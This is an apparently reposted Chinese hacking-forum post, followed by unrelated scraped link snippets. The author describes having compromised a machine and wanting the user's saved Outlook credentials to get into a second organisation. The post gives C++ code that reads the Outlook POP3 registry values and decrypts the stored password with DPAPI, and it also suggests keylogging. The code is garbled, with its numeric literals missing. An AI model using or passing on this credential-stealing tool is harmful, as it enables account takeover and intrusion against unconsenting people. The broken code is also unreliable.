原文连接:https://forum.90sec.org/forum.php?mod=viewthread&tid=8410

作者:Agile

用过OUTLOOK的人都知道,OUTLOOK的密码会以二进制的方式保存在注册表里,而我们只要找到注册表的值,是可以直接解密成铭文的。
这几天一直在搞一台个人机,这台机器关系人物是这样的。

A集团。

B集团。

我已经控制了B集团,但是B集团里有人还在A集团里干事,我比较喜欢A集团,所以得把B集团的远程访问内部的账户密码难道,其中就包括啦 OUTLOOK的密码。

但是一般用户在设置的时候,OUTLOOK密码是默认记住的,以下是几种办法:

OUTLOOK密码保存那儿,方式一般分3种把?(如果说错了请见谅)

1:IMAP
2:POP3
3:SMTP

今天研究了一天,觉得还是没问题的,办法如下:

Ps:很多人说网上工具不少,工具确实不少,但是你知道工具原理是怎么做的吗? 工具免杀吗?工具有后门吗? 这些都是一个问题,所以我才写这个小工具

1:找到PASSWORD的值,删了,键盘记录,直接记录下了。

2:直接找到地址,解密PASSWORD的值

目前我就想到这2种方式,本来之前zcgonvh和我说的时候,我说:不能直接把注册表值DUMP本地来破解吗?

zcgonvh  的回复是:不可以,必须在目标机器目标用户解密
dpapi用的是rsa/dsa+3des/aes,默认是rsa+3des。本地有一个与用户sid、机器全局guid关联的key用作解密,即使拷出来由于不同机器的用户sid和guid不同也会导致无效,光复制数据的话肯定是解密不了的。

所以这种方式我也没试过。

代码写的很粗糙,因为基础不行,所以给一些需要的人用。
Code:

#include "stdafx.h"

#include <windows.h>

#include <iostream>

#include <cstdlib>

#include <stdio.h>

using namespace std;

#pragma comment(lib, "crypt32.lib") 

WINCRYPT32API

        BOOL

        WINAPI

        CryptUnprotectData(

        __in            DATA_BLOB*      pDataIn,             // in encr blob

        __deref_opt_out_opt LPWSTR*     ppszDataDescr,       // out

        __in_opt        DATA_BLOB*      pOptionalEntropy,

        __reserved      PVOID           pvReserved,

        __in_opt        CRYPTPROTECT_PROMPTSTRUCT*  pPromptStruct,

        __in            DWORD           dwFlags,

        __out           DATA_BLOB*      pDataOut

        );

void opt(char* prog)

{

        printf("Welcome [url=http://www.90sec.org]www.90sec.org[/url]\r\n");

        printf("[-]:%s Get_pop3 passwords\r\n",prog);

}

int main(int argc,char* argv[])

{

        opt(argv[]);

        printf("\r\n");

        HKEY hKey;

        LPCTSTR lpRun = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Test\\9375CFF0413111d3B88A00104B2A6676\\00000002";

        //READ POP3 DATA define

        //----------------------------------------

        DWORD sizeBuff = ; //read length

        DWORD dwtype = REG_BINARY; // reg type

        BYTE reBuff[] = {}; //save string length

        long lRet; //Reg return values

        BYTE SmtpServer[] = {}; //read reg String length

        DWORD SMtplen = ; //DWORD reg read length

        BYTE SmtpUser[] = {};//read reg String length

        DWORD SMtpUserlen = ; //DWORD reg read length

        //------------------------------------------

        lRet= RegOpenKeyEx(HKEY_CURRENT_USER, lpRun, , KEY_READ, &hKey); //open reg

        if (lRet != ERROR_SUCCESS)

        {

                printf("RegOpenKeyEx Failed\r\n");

                return ;

        }else

        {

                printf("RegOpenKeyEx Ing.....\r\n");

        }

        if (RegQueryValueEx(hKey,L"POP3 User",,&dwtype,SmtpUser,&SMtpUserlen) == ERROR_SUCCESS) //query Pop3 Server address

        {

                //cout << "Smtp User:" << SmtpServer << endl;

                printf("POP3 User:%S\r\n",SmtpUser);//print Pop3 user

        }

        if (RegQueryValueEx(hKey,L"POP3 Server",,&dwtype,SmtpServer,&SMtplen) == ERROR_SUCCESS) //query Pop3 Server address

        {

                //cout << "Smtp User:" << SmtpServer << endl;

                printf("Smtp Server:%S\r\n",SmtpServer);//print server address

        }

        if(RegQueryValueEx(hKey,L"POP3 Password",,&dwtype,reBuff,&sizeBuff) == ERROR_SUCCESS) //query POP3 password

        {

                DATA_BLOB DataPassword;

                DATA_BLOB DataOutput;

                DataPassword.cbData = sizeBuff -;

                DataPassword.pbData = &reBuff[];

                if(CryptUnprotectData(&DataPassword,,,,,CRYPTPROTECT_UI_FORBIDDEN,&DataOutput)) //Crypt pop3 password

                {

                        //cout << DataOutput.pbData << endl;

                        wcout << "POP3 Password: " << (wchar_t*)DataOutput.pbData;   //print password

                }else

                {

                        cout << "Read error\r\n" << endl; //error

                        return ;

                }

                return ;

}

        RegCloseKey(hKey);

        return ;

}

如果是其他方式,改改代码就好了,就是路径问题。没有遍历注册表,查找值,有功底的改改把。
具体可以看这儿:http://securityxploded.com/outlookpasswordsecrets.php

VC 解密OUTLOOK pop3保存注册表密码的更多相关文章

  1. 注册表对比工具(Regshot) V2.0.1 中文绿色版

    软件名称: 注册表对比工具(Regshot)软件语言: 简体中文授权方式: 免费软件运行环境: Win7 / Vista / WinXP软件大小: 263KB图片预览: 软件简介:Regshot 是一 ...

  2. 10#Windows注册表的那些事儿

    引言 用了多年的Windows系统,其实并没有对Windows系统进行过深入的了解,也正是由于Windows系统不用深入了解就可以简单上手所以才有这么多人去使用.笔者是做软件开发的,使用的基本都是Wi ...

  3. [原创]K8飞刀20160613 Plesk密码 & 注册表16进制转换 & Html实体解密

    K8飞刀  by K8拉登哥哥@[K8搞基大队]博客: http://qqhack8.blog.163.com 简介: K8飞刀是一款多功能的安全测试工具. Hacker Swiss Army Kni ...

  4. VC++ MFC中如何将应用程序的配置信息保存到注册表中(二)

    在上一篇中介绍了几个写入注册表数据和读取注册表数据的接口,并介绍了使用方法. 这一片教你如何使得你的应用程序在下次打开时保持上一次关闭前的状态. 在上一篇添加的代码的基础上,要添加WM_CLOSE消息 ...

  5. vc读写注册表

    注册表是Windows重要组成部分,注册表记录了大量有关电脑软硬件的信息.注册表中的值通过其名称标识.值名称由与键名相同的字符组成.值本身可以是字符串.二进制数据或者是32位无符号值.在这里我们主要运 ...

  6. java如何操作注册表(Preferences类)(在windows的注册表中保存、读取)

    我们经常需要将我们的程序运行中的一些信息(比如在选项对话框中的设置)记录下来,以做便再次运行的时候不用再重写填写这些数据.这对改善软件的人机可用性方面是很有用的.比如:数据库监控.日志工具,JDBMo ...

  7. c# asp.net 鼠标改变控件坐标位置,更改控件坐标,注册表保存读取,打印,查找局域网内打印机等等收集

    界面虽然被我弄的很难看,但功能还可以 里边注册表的路径自己设置一下,或者加一个创建注册表的语句,不然会报错 前台: <%@ Page Language="C#" AutoEv ...

  8. Win10注册表无法保存对权限所作的更改拒绝访问

    在对系统的安全控制得越来越多的情况下,要对注册表的关键数据进行修改是件挺麻烦的事,时不时会弹出无法保存对xxxxxx权限所作的更改,拒绝访问,操作产生错误,操作出现错误的提示,这时怎么办呢?这里就最近 ...

  9. C#实现在注册表中保存信息

    C#实现在注册表中保存信息 最近做的项目需要在注册表中记录一些用户设置,方便在程序下次启动时读取设置,应用上次用户保存的设置,挺简单的. 写出来,方便记忆,以后要用,可以直接改改就能用. 1 usin ...

随机推荐

  1. Arduino101学习笔记(十一)—— 蓝牙BLE

    一.BLE技术简介 第四代蓝牙既包括传统的蓝牙,现在标有"蓝牙经典",和新的低功耗蓝牙(Bluetooth LE,或BLE).低数据速率,低功耗优化. 蓝牙LE广播就像一个社区公告 ...

  2. MOB 短信验证

    工具/原料   Android Studio mob SDK中的jar 和.so文件 方法/步骤   1 把3个jar 放入libs   并添加依赖 在项目的build.gradle里面   在你的项 ...

  3. MySQL客户端工具推荐

    PhpMyAdmin 傻瓜级的 Web 页面管理器,无需到处安装,只需一台支持 PHP 运行环境的服务器 功能上一般只限数据表的增删改查 在一台安装了phpmyadmin的机器上是可以连其它服务器上的 ...

  4. 利用scp传输文件小结

    从本地复制到远程 scp mysql-5.5.29-linux2.6-x86_64.tar.gz 192.168.1.11:/opt 指定端口: scp -P 60022 /opt/ray/nginx ...

  5. [技术学习]js接口继承

    js是面向对象语言,但是js又缺乏了面向对象的诸多特性,比如继承,没有接口继承也没有父类继承,因此有时候需要人工来实现继承. 一.首先看下java中面向对象的继承: //定义类鸟类的飞行动作 inte ...

  6. js不间断平滑地自动向上滚动

    <html> <head> <title>scroll up auto smooth</title> <style> *{ margin: ...

  7. js动画实现透明度动画

    在本次实例中,由于一般主流的浏览器对于透明度opacity最大值为1,但是在IE6最大值是100,此次例子是按主流浏览器的透明度来算的,所以定义的是小数,也可以定义为整数为单位,在运算的时候遇到主流的 ...

  8. JS原型对象通俗"唱法"

    书上对于原型对象的说法给我整的眼花缭乱,完全不知道它在说什么,查了好多资料,终于有了些理解,下面我以通俗的大白话说说我对原型对象的理解. 1.关于原型对象的重要知识点 首先要知道一个很重要的知识点,一 ...

  9. Backbone.js学习之二

    经历一段自我修炼,终于领悟到Backbone.js的关键知识点,也发现了原来MVC可以在前端这样梦幻的发挥,Backbone.js确实是一个很有魅力的前端MVC框架. 练就一门技术,需要有扎实的功底, ...

  10. @font-face制作Web Icon

    @font-face是CSS3中有关于字体设置的属性,通过@font-face可以将本地字体设置为Web页面字体,并能兼容所有浏览器,使用这个属性就不必担心用户本地不具备这样的字体.因为我们把字体都上 ...